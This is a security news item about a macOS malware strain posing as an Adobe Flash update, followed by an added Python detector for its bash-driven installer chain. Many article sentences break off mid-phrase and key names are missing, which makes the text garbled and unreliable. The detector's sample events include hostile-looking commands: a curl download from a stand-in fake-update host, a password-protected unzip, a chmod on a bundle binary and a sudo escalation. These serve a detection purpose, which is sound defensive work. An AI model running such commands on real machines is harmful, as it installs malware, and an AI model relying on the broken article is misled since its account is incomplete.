Security experts at Carbon Black have recently spotted a new strain of the
The malware poses as an Adobe Flash update and was distributed through a large number of websites, both fake domains and compromised legitimate ones.
“AU has obtained new samples of this malware and observed downloads of the malware from multiple sites, primarily disguised as an Adobe Flash software update,” reads the analysis published by Carbon Black.
“Many of the sites that we have found to redirect to these fake updates have been those masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from
This variant of the
The malware uses legitimate system applications via bash to conduct all installation activity.
Once the installer is launched, a
The first stage malware gathers system information, including macOS version and UUID, generates a “Session GUID” using
The malicious script attempts to download the password-protected ZIP file using
The script also makes the binary within the unzipped .app executable using
The second stage malware attempts to escalate privileges with
“After the second stage payload is downloaded and executed, it attempts to escalate privileges with
“Once the malware has elevated to root privileges, it attempts to download additional software (observed to be
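As an added example (not code from Carbon Black's analysis), the check below scores a sequence of process events for the bash-driven installer chain described above: a Flash-themed lure, system recon, a download, a password-protected unzip, marking a bundled binary executable, and a privilege-escalation attempt. The event format, the tool names (sw_vers, ioreg, curl, unzip, chmod, sudo) and every sample line are constructed assumptions, since the page does not give the actual commands.

```python
import re

# Constructed sample of process events as (parent process name, command line),
# modelled on the installer chain in the write-up. Tool names are assumptions.
SAMPLE_EVENTS = [
    ("Finder", "/Users/u/Downloads/AdobeFlashPlayer.app/Contents/MacOS/Install"),
    ("Install", "/bin/bash /tmp/install.sh"),
    ("bash", "sw_vers -productVersion"),                 # macOS version
    ("bash", "ioreg -rd1 -c IOPlatformExpertDevice"),     # hardware UUID
    ("bash", "curl -s -o /tmp/p.zip http://fake-update.invalid/p.zip"),
    ("bash", "unzip -P S3cret /tmp/p.zip -d /tmp/"),      # password-protected ZIP
    ("bash", "chmod +x /tmp/Player.app/Contents/MacOS/Player"),
    ("bash", "sudo -S /tmp/Player.app/Contents/MacOS/Player"),
]

# Constructed benign activity: a user script that also downloads and unzips.
BENIGN_EVENTS = [
    ("Terminal", "/bin/bash"),
    ("bash", "sw_vers -productVersion"),
    ("bash", "curl -s -o notes.zip https://example.invalid/notes.zip"),
    ("bash", "unzip notes.zip"),
]

# Stage label and the command-line pattern that evidences it. All stages except
# the lure are only counted when the command was spawned by bash.
STAGES = [
    ("flash_lure", re.compile(r"flash.*\.app/", re.I)),
    ("system_recon", re.compile(r"^(sw_vers|ioreg)\b")),
    ("download", re.compile(r"^curl\b")),
    ("password_protected_unzip", re.compile(r"^unzip\b.*\s-P\s")),
    ("mark_app_binary_executable",
     re.compile(r"^chmod\b.*\+x\b.*\.app/Contents/MacOS/")),
    ("privilege_escalation", re.compile(r"^sudo\b")),
]


def detect_fake_updater_chain(events, min_stages=4):
    """Return the installer-chain stages seen, in order, and whether they
    cross the alert threshold. Each stage is counted at most once."""
    seen = []
    for parent, cmdline in events:
        for label, pattern in STAGES:
            if label in seen:
                continue
            in_scope = parent == "bash" or label == "flash_lure"
            if in_scope and pattern.search(cmdline):
                seen.append(label)
    return {"stages": seen, "alert": len(seen) >= min_stages}


if __name__ == "__main__":
    print(detect_fake_updater_chain(SAMPLE_EVENTS))
    print(detect_fake_updater_chain(BENIGN_EVENTS))
```

The threshold keeps a lone curl-plus-unzip from alerting; the combination of the lure, the chmod on a bundle binary and the sudo attempt is what distinguishes the chain.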
Carbon Black’s analysis includes Indicators of Compromise.